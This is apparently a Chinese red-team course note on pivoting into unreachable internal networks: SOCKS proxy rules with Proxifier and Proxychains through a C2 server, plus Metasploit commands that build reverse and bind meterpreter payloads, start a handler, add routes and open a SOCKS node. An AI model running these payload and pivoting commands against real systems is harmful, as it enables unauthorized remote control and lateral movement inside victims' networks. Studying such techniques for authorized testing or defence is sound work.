代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

#代理技术-SockS配置-网络不可达-通讯解决

解决:信息收集打点和漏洞利用部分

注意:配置连接IP为C2服务器IP

工具:Proxifier Proxychains等

Proxifier使用:

直接看课程演示图形化操作

配置代理服务器为csIP地址

配置代理规则ip地址为想要通讯的主机 然后用cs的ip地址为代理

然后开始漏洞打点 假如上传到后门要上传正向后门

刚开始是192.168.139.144反向链接192.168.139.141 后期用cs正向链接192.168.2.22 因为反向链接的话 网络达不到

Proxychains使用:

加入修改配置: /etc/proxychains4.conf

调用加载测试: proxychains4 curl http://192.168.2.22

C2平台:MSF/CS/Sliver/Viper等

实现步骤:

1、在被控机器上获取下一级网段

2、在被控及其上建立SockS节点

3、在工具上配置连接属性和规则触发

#代理技术-正反向监听-网络不可达-C2上线

C2平台:MSF/CS/Sliver/Viper等

实现步骤:

反向监听器:reverse

正向监听器:bind(需主动连接)

CS操作:

直接看课程演示图形化操作

MSF操作命令:

配置反向上线:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler(用来收集信息的)

set payload windows/meterpreter/reverse_tcp(反向payload)

set lhost 0.0.0.0

set lport 3333

run

查看路由表:

run autoroute -p

run post/multi/manage/autoroute

创建socks节点:

auxiliary/server/socks_proxy

配置正向上线:

msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost xx.xx.xx.xx

set lport 6666

run

相关推荐
月光技术杂谈38 分钟前
实战:C驱动框架嵌入Rust模块的互操作机制与完整流程
c语言·开发语言·rust·ffi·跨语言·bindgen·互操作
合作小小程序员小小店1 小时前
游戏开发,桌面%小游戏,贪吃蛇%demo,基于vs2022,c语言,easyX,无数据库
c语言·开发语言
WongKyunban5 小时前
Linux中的线程是什么?
c语言
LaoZhangGong1236 小时前
以太网HTTP数据包格式分析
c语言·stm32·网络协议·http·tcp·arp
lingggggaaaa8 小时前
免杀对抗——C2远控篇&PowerShell&有无文件落地&C#参数调用&绕AMSI&ETW&去混淆特征
c语言·开发语言·笔记·学习·安全·microsoft·c#
口袋物联8 小时前
设计模式之建造者模式在 C 语言中的应用(含 Linux 内核实例)
c语言·设计模式·建造者模式
切糕师学AI9 小时前
位带操作(Bit-Banding)是什么?
c语言·arm·嵌入式开发·cortex-m·位带操作
学习路上_write9 小时前
嵌入式系统bringup指南:软硬件调试
c语言·单片机·嵌入式硬件
say_fall9 小时前
C语言编程实战:每日一题 - day7
c语言·开发语言
小龙报9 小时前
《算法通关指南数据结构和算法篇(2)--- 链表专题》
c语言·数据结构·c++·算法·链表·学习方法·visual studio